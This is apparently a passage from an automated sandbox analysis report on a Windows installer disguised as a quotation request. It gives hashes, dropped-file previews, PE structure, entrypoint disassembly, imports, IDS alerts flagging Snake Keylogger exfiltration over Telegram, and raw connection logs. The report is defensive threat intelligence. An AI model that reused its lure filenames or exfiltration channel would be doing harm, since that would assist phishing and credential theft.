                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                              Joe Sandbox View:
                                                                                                                              • Filename: IBAN payment confirmation.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                                              • Filename: WC10SCPMaX.exe, Detection: malicious, Browse
                                                                                                                              • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                                              • Filename: CL714440147.exe, Detection: malicious, Browse
                                                                                                                              • Filename: TKnBbCiX07.exe, Detection: malicious, Browse
                                                                                                                              • Filename: ________.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Snurrevoddenes.exe, Detection: malicious, Browse
                                                                                                                              • Filename: Eksistensberettigelsernes102.exe, Detection: malicious, Browse
                                                                                                                              • Filename: ALI HASSO - P02515 & P02518.exe, Detection: malicious, Browse
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):298784
                                                                                                                              Entropy (8bit):7.736636534495347
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6144:M2ljJ7MW6Lv6XHzwgmTtPC8x3Km8EXu16x6l6n4o2F5rmebxnHz:M4ubGzwg2ZCjm8EO6x6l64XFltbJz
                                                                                                                              MD5:C1035965687C9BDA80A00EFC020863D9
                                                                                                                              SHA1:79C4E5A175290C8DCC548F85FCF9FDF9B2F75096
                                                                                                                              SHA-256:A9A729569A3960676154A62623D6722EC46226228C70DB79A53DCB576126C56B
                                                                                                                              SHA-512:F76E2E406F3A2AE25CF5D2F7675CAF8DD583E7C1361D12E12A1F35EA86177AE4263129BB6BEF25A488FB016B28F3786C7149995670220AA4B90F3A4BECF7DF73
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:...........++.......................................................EE......%.....................I.G...........F....ppp............N.......................Z.qqq..........'.2.mmm............u..........iiiii.~~~~~~..............mmm............vv........o.............>>........6.....nnn...c.................S...........2........................---.....k...k......w..........ii.....t.(.pp......................................b.u.PP............S..r..........^..V.....................I.......11.......>..;;;......//.......g..".............y...!............m......%.....!........6..................vv...........t.<.^........{...............VVVV...........ddd..999.......O...........5........###...................................||.....33...................RRRR.......................m.................[[......!!!!.................................hh......@.h..u............................qq.........l.666666.rrr.????....f..............YYYY........~............III.:.............................FFFF....-
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):161977
                                                                                                                              Entropy (8bit):1.2465706431701635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                                                              MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                                                              SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                                                              SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                                                              SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):28382
                                                                                                                              Entropy (8bit):4.542161038457155
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:384:7B8dlWrSIZBUx6RvCA6yOjeKNk1IOO8n/RFapPWQ1eAEU8CEwffnMfA5XHt:7B8dlWnf5EATcrkgFn8CjnMfA1Ht
                                                                                                                              MD5:09F0F33D40E7290D770353F19C7013A2
                                                                                                                              SHA1:757A2718341EAA21285F8F5B879213814DCB7B88
                                                                                                                              SHA-256:BE35F7639DDFD3EE887D53F51337859DC721FC3D89F23AE45553235F978E5B98
                                                                                                                              SHA-512:11655A921B0201A5A516FA1360BBE951A4166B8D0207A703E257F5B45244409487452C4A2D7B628F9900F302C1B7159B863897158E1A0D84C00A7F63987A4964
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:.....1.j...w...bbb.f..................................................88........x......................\\.......xx..............~~.....EEEE.................8.................J...............>...1.............zzz..I..............m..........%%...3.....V..T...77.NNNNNN.............rrrr.T...%%%.SS.....................0........JJ......44.JJ.y...........:.........uu........s.E.u.888.Y..............;........).<........U....D..nn........ww........;..............................[....................^..F..........VVVVV................................................TTT................MM.............B.Y....pp....!!.........S.........AA.....TT......::::::.KKKK.....l............^.....iii...................HHH......L.............................\\\......................jj..%%%%............2..............QQ..t......................................vvvv.cc...............................((............................g.........Y.UUU...........7..g.***................x.jj.,.......QQQQQ.......e....ww.}}...
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2929
                                                                                                                              Entropy (8bit):7.418910042244289
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                                                              MD5:49DAF4E74443D8502F3229468615185F
                                                                                                                              SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                                                              SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                                                              SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):461378
                                                                                                                              Entropy (8bit):1.252059381950645
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                                                              MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                                                              SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                                                              SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                                                              SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                                                              Malicious:false
                                                                                                                              Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................
                                                                                                                              Process:C:\Users\user\Desktop\REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):225641
                                                                                                                              Entropy (8bit):1.2362366155163755
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:768:HcPiBl7QD/ad4B+etLBBF64vscOIBiMFYnfBc1TS/HVtHlY4bDzZkmNQyFY670Fn:QaxOPt/G9V4yf7P/zZkX00b/h
                                                                                                                              MD5:94C4B93474D07658FCBD411A20E68532
                                                                                                                              SHA1:66421117EB902B48D39A1514C88C868394085FCF
                                                                                                                              SHA-256:50B1D7356F0CC22F2A9AE93A7CC9738C6BC0907724ACDB85F68F594333B706DC
                                                                                                                              SHA-512:BC1C40FF5B9FD71590E9B3E71D7B58A46E8AFBE56DFBD22C39F5DC0952ACEDC96F2BC4D8428EA0BCD75D67BD32F2B095585925CD8141063801FB128EA46F7471
                                                                                                                              Malicious:false
                                                                                                                              Preview:..........................~................................................/........[...............................................R......................R....................................................{.....................................E.........................E.....................................................8...../...................................5.............................................K...........................*.....................................k...................|.......=....................s....................................................................p...2...................................g.N................#................~......................................B..................................................J........................?............................{./.........................U................................z...........+..........................................................K..........................................A......
                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                              Entropy (8bit):7.070078101481484
                                                                                                                              TrID:
                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                              File name:REQUEST FOR QUOATION AND PRICES.exe
                                                                                                                              File size:734'480 bytes
                                                                                                                              MD5:143edb6c5c1e1a1e06695965f2b5cb74
                                                                                                                              SHA1:b43660357dbe4c3d84d4239b6273817b5eb1ff53
                                                                                                                              SHA256:05814550e1562d4c54710804145c678b6191aab6a07c73e6f7902b1149bb020d
                                                                                                                              SHA512:8656e2e854a66f2901898147303fa5119c691defc06745d38d93ce0ef06ff243d85b8d0d109d0ef18c4bb3b1de29a5c76961b85a77959c0d93b9179546bbe761
                                                                                                                              SSDEEP:12288:xlYZmcRHOohpeGbzpAbzRglY6y/utl97avDAoXPJO2RpXD3j:UmcdOohMyz5Y6yK7arHXPJOyXjj
                                                                                                                              TLSH:30F4D01F1B168406EE9415F2B8A3CE53A6F5BFBC206973456D62FF1780B3E70394A189
                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L.....oS.................`...*......Z3.......p....@
                                                                                                                              Icon Hash:058cc0e474936126
                                                                                                                              Entrypoint:0x40335a
                                                                                                                              Entrypoint Section:.text
                                                                                                                              Digitally signed:false
                                                                                                                              Imagebase:0x400000
                                                                                                                              Subsystem:windows gui
                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                              Time Stamp:0x536FD79B [Sun May 11 20:03:39 2014 UTC]
                                                                                                                              TLS Callbacks:
                                                                                                                              CLR (.Net) Version:
                                                                                                                              OS Version Major:4
                                                                                                                              OS Version Minor:0
                                                                                                                              File Version Major:4
                                                                                                                              File Version Minor:0
                                                                                                                              Subsystem Version Major:4
                                                                                                                              Subsystem Version Minor:0
                                                                                                                              Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                                                                              Instruction
                                                                                                                              sub esp, 000002D4h
                                                                                                                              push ebx
                                                                                                                              push ebp
                                                                                                                              push esi
                                                                                                                              push edi
                                                                                                                              push 00000020h
                                                                                                                              xor ebp, ebp
                                                                                                                              pop esi
                                                                                                                              mov dword ptr [esp+14h], ebp
                                                                                                                              mov dword ptr [esp+10h], 00409230h
                                                                                                                              mov dword ptr [esp+1Ch], ebp
                                                                                                                              call dword ptr [00407034h]
                                                                                                                              push 00008001h
                                                                                                                              call dword ptr [004070BCh]
                                                                                                                              push ebp
                                                                                                                              call dword ptr [004072ACh]
                                                                                                                              push 00000008h
                                                                                                                              mov dword ptr [00429298h], eax
                                                                                                                              call 00007FD7CC7C779Ch
                                                                                                                              mov dword ptr [004291E4h], eax
                                                                                                                              push ebp
                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                              push 000002B4h
                                                                                                                              push eax
                                                                                                                              push ebp
                                                                                                                              push 00420690h
                                                                                                                              call dword ptr [0040717Ch]
                                                                                                                              push 0040937Ch
                                                                                                                              push 004281E0h
                                                                                                                              call 00007FD7CC7C7407h
                                                                                                                              call dword ptr [00407134h]
                                                                                                                              mov ebx, 00434000h
                                                                                                                              push eax
                                                                                                                              push ebx
                                                                                                                              call 00007FD7CC7C73F5h
                                                                                                                              push ebp
                                                                                                                              call dword ptr [0040710Ch]
                                                                                                                              cmp word ptr [00434000h], 0022h
                                                                                                                              mov dword ptr [004291E0h], eax
                                                                                                                              mov eax, ebx
                                                                                                                              jne 00007FD7CC7C48EAh
                                                                                                                              push 00000022h
                                                                                                                              mov eax, 00434002h
                                                                                                                              pop esi
                                                                                                                              push esi
                                                                                                                              push eax
                                                                                                                              call 00007FD7CC7C6E46h
                                                                                                                              push eax
                                                                                                                              call dword ptr [00407240h]
                                                                                                                              mov dword ptr [esp+18h], eax
                                                                                                                              jmp 00007FD7CC7C49AEh
                                                                                                                              push 00000020h
                                                                                                                              pop edx
                                                                                                                              cmp cx, dx
                                                                                                                              jne 00007FD7CC7C48E9h
                                                                                                                              inc eax
                                                                                                                              inc eax
                                                                                                                              cmp word ptr [eax], dx
                                                                                                                              je 00007FD7CC7C48DBh
                                                                                                                              add word ptr [eax], 0000h
                                                                                                                              Programming Language:
                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804
                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x5f0000x43188.rsrc
                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                              .text0x10000x5e680x60002f6554958e1a5093777de617d6e0bffcFalse0.6566162109375data6.419811957742583IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                              .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              .data0x90000x202d80x6009587277f9a9b39e2caf86eae07909d87False0.4733072916666667data3.757932017065988IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .ndata0x2a0000x350000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                              .rsrc0x5f0000x431880x43200ad79ab7bc0418c21ba04b90eb50d4a0cFalse0.18500494646182494data4.605797713668011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                              RT_BITMAP0x5f2b00x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                                                                                                              RT_ICON0x5f6180x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.1810552711779152
                                                                                                                              RT_DIALOG0xa16400x144dataEnglishUnited States0.5216049382716049
                                                                                                                              RT_DIALOG0xa17880x13cdataEnglishUnited States0.5506329113924051
                                                                                                                              RT_DIALOG0xa18c80x100dataEnglishUnited States0.5234375
                                                                                                                              RT_DIALOG0xa19c80x11cdataEnglishUnited States0.6091549295774648
                                                                                                                              RT_DIALOG0xa1ae80xc4dataEnglishUnited States0.5918367346938775
                                                                                                                              RT_DIALOG0xa1bb00x60dataEnglishUnited States0.7291666666666666
                                                                                                                              RT_GROUP_ICON0xa1c100x14dataEnglishUnited States1.1
                                                                                                                              RT_VERSION0xa1c280x258dataEnglishUnited States0.5216666666666666
                                                                                                                              RT_MANIFEST0xa1e800x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                                                                              DLLImport
                                                                                                                              KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                                                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                                                                              GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                              SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                                                                              ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                              ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                                                                              VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                                              EnglishUnited States
                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                              2024-12-03T15:22:42.735160+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.749780172.217.19.174443TCP
                                                                                                                              2024-12-03T15:22:51.057369+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749802132.226.247.7380TCP
                                                                                                                              2024-12-03T15:22:59.588677+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749802132.226.247.7380TCP
                                                                                                                              2024-12-03T15:23:01.791954+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749830149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:04.323085+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749838132.226.247.7380TCP
                                                                                                                              2024-12-03T15:23:06.396891+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749844149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:08.010701+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749850132.226.247.7380TCP
                                                                                                                              2024-12-03T15:23:10.145994+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749852149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:13.917148+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749863149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:17.893806+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749875149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:21.905465+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749883149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:25.604826+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749894149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:29.303112+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749903149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:32.999234+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749913149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:37.577523+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749925149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:41.186381+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749935149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:44.858088+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749943149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:48.483823+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749951149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:52.010679+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749962149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:55.703363+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749968149.154.167.220443TCP
                                                                                                                              2024-12-03T15:23:59.435944+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749978149.154.167.220443TCP
                                                                                                                              2024-12-03T15:24:05.296567+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749980149.154.167.220443TCP
                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                              Dec 3, 2024 15:22:40.018177032 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:40.018229008 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:40.018384933 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:40.029048920 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:40.029062033 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:41.823081970 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:41.823190928 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:41.823931932 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:41.823990107 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:41.889066935 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:41.889097929 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:41.889385939 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:41.889437914 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:41.894035101 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:41.935331106 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.735156059 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.735268116 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:42.735300064 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.735354900 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:42.735547066 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:42.735593081 CET44349780172.217.19.174192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.735645056 CET49780443192.168.2.7172.217.19.174
                                                                                                                              Dec 3, 2024 15:22:42.888720989 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:42.888747931 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:42.888824940 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:42.889153004 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:42.889163971 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:44.638675928 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:44.638784885 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:44.652261019 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:44.652295113 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:44.652631044 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:44.652802944 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:44.653234959 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:44.699327946 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:47.999346972 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:47.999427080 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:48.016175032 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:48.016258955 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:48.029124022 CET44349789142.250.181.97192.168.2.7
                                                                                                                              Dec 3, 2024 15:22:48.029202938 CET49789443192.168.2.7142.250.181.97
                                                                                                                              Dec 3, 2024 15:22:48.111013889 CET44349789142.250.181.97192.168.2.7
